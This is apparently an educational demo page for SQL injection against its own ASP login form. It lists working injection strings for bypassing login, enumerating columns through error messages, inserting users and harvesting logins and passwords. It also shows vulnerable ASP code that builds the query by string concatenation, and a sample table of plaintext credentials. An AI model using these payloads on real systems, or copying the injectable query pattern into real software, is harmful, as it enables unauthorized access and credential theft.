Record Editor

This web page is intended as a demonstration of the SQL Injection Attack .

To use this page, copy-and-paste each of the SQL statements given below into the Login text box and click "Login".

Unauthorized Access

Description SQL statement

Login with a know login (but with no password) pardue'--

Login as first person in table ' or 1=1--

Login as fictional user ' union select 1, 'somebody', 'somepassword', 1--

Note: In IE, turn off the "show friendly HTTP error messages" under the advanced internet options tab in order to see asp exception.

Probing table structure and data values with SQL Sever error messages

Description SQL statement

1. Establish table name and column names of authentication table ' having 1=1--

' group by tblSqlUser.eid having 1=1--

' group by tblSqlUser.eid, tblSqlUser.login having 1=1--

' group by tblSqlUser.eid, tblSqlUser.login, tblSQlUser.password having 1=1--

' group by tblSqlUser.eid, tblSqlUser.login, tblSQlUser.password, tblSqlUser.cr_tm having 1=1--

until an unsuccesful login attempt which means all columns have been enumerated

confirming there is only one authentication table and the order of the columns.

2. Identify datatypes ' union select sum(eid), 1,1,1 from tblSqlUser--

' union select sum(login), 1,1,1 from tblSqlUser--

' union select sum(password), 1,1,1 from tblSqlUser--

' union select sum(cr_tm), 1,1,1 from tblSqlUser--

Int, Nvarchar, Nvarchar, DateTime respectively

3. Insert new user into the authentication table. (INSERT permission revoked) '; insert into tblSqlUser values('newuser', 'mypass', 'datetime')--

4. Harvest logins ' union select min(login), 1,1,1 from tblSqlUser where login > 'a'--

' union select min(login), 1,1,1 from tblSqlUser where login > 'Aline'--

' union select min(login), 1,1,1 from tblSqlUser where login > 'khaley'--

' union select min(login), 1,1,1 from tblSqlUser where login > 'ksaifullah'--

' union select min(login), 1,1,1 from tblSqlUser where login > 'pardue'--

5. Harvest passwords ' union select password, 1,1,1 from tblSqlUser where login = 'Aline'--

' union select password, 1,1,1 from tblSqlUser where login = 'khaley'--

' union select password, 1,1,1 from tblSqlUser where login = 'ksaifullah'--

' union select password, 1,1,1 from tblSqlUser where login = 'pardue'--

tblSqlUser

Eid Login Password Cr_tm

1 pardue somethingeasytoguess 2005-11-20 10:40

2 aline r123377 2005-11-22 11:30

3 khaley 4rjuj5j 2005-11-22 11:50

4 ksaifullah 4fvgt6 2005-11-23 01:22

ASP script for creating recordset string

Set rsUser = Server.CreateObject ("ADODB.Recordset")
SQLexpression="SELECT * FROM tblSqlUser WHERE Login = '" & request("txtLogin") & "' AND Password = '" & request("txtPassword") & "';"
rsUser.Open SQLexpression, DatabaseConnection, adOpenDynamic, adLockOptimistic, adCmdText

Description	SQL statement
Login with a know login (but with no password)	pardue'--
Login as first person in table	' or 1=1--
Login as fictional user	' union select 1, 'somebody', 'somepassword', 1--

Description	SQL statement
1. Establish table name and column names of authentication table	' having 1=1--
	' group by tblSqlUser.eid having 1=1--
	' group by tblSqlUser.eid, tblSqlUser.login having 1=1--
	' group by tblSqlUser.eid, tblSqlUser.login, tblSQlUser.password having 1=1--
	' group by tblSqlUser.eid, tblSqlUser.login, tblSQlUser.password, tblSqlUser.cr_tm having 1=1--
until an unsuccesful login attempt which means all columns have been enumerated
confirming there is only one authentication table and the order of the columns.

2. Identify datatypes	' union select sum(eid), 1,1,1 from tblSqlUser--
	' union select sum(login), 1,1,1 from tblSqlUser--
	' union select sum(password), 1,1,1 from tblSqlUser--
	' union select sum(cr_tm), 1,1,1 from tblSqlUser--
Int, Nvarchar, Nvarchar, DateTime respectively

3. Insert new user into the authentication table. (INSERT permission revoked)	'; insert into tblSqlUser values('newuser', 'mypass', 'datetime')--

4. Harvest logins	' union select min(login), 1,1,1 from tblSqlUser where login > 'a'--
	' union select min(login), 1,1,1 from tblSqlUser where login > 'Aline'--
	' union select min(login), 1,1,1 from tblSqlUser where login > 'khaley'--
	' union select min(login), 1,1,1 from tblSqlUser where login > 'ksaifullah'--
	' union select min(login), 1,1,1 from tblSqlUser where login > 'pardue'--

5. Harvest passwords	' union select password, 1,1,1 from tblSqlUser where login = 'Aline'--
	' union select password, 1,1,1 from tblSqlUser where login = 'khaley'--
	' union select password, 1,1,1 from tblSqlUser where login = 'ksaifullah'--
	' union select password, 1,1,1 from tblSqlUser where login = 'pardue'--

Eid	Login	Password	Cr_tm
1	pardue	somethingeasytoguess	2005-11-20 10:40
2	aline	r123377	2005-11-22 11:30
3	khaley	4rjuj5j	2005-11-22 11:50
4	ksaifullah	4fvgt6	2005-11-23 01:22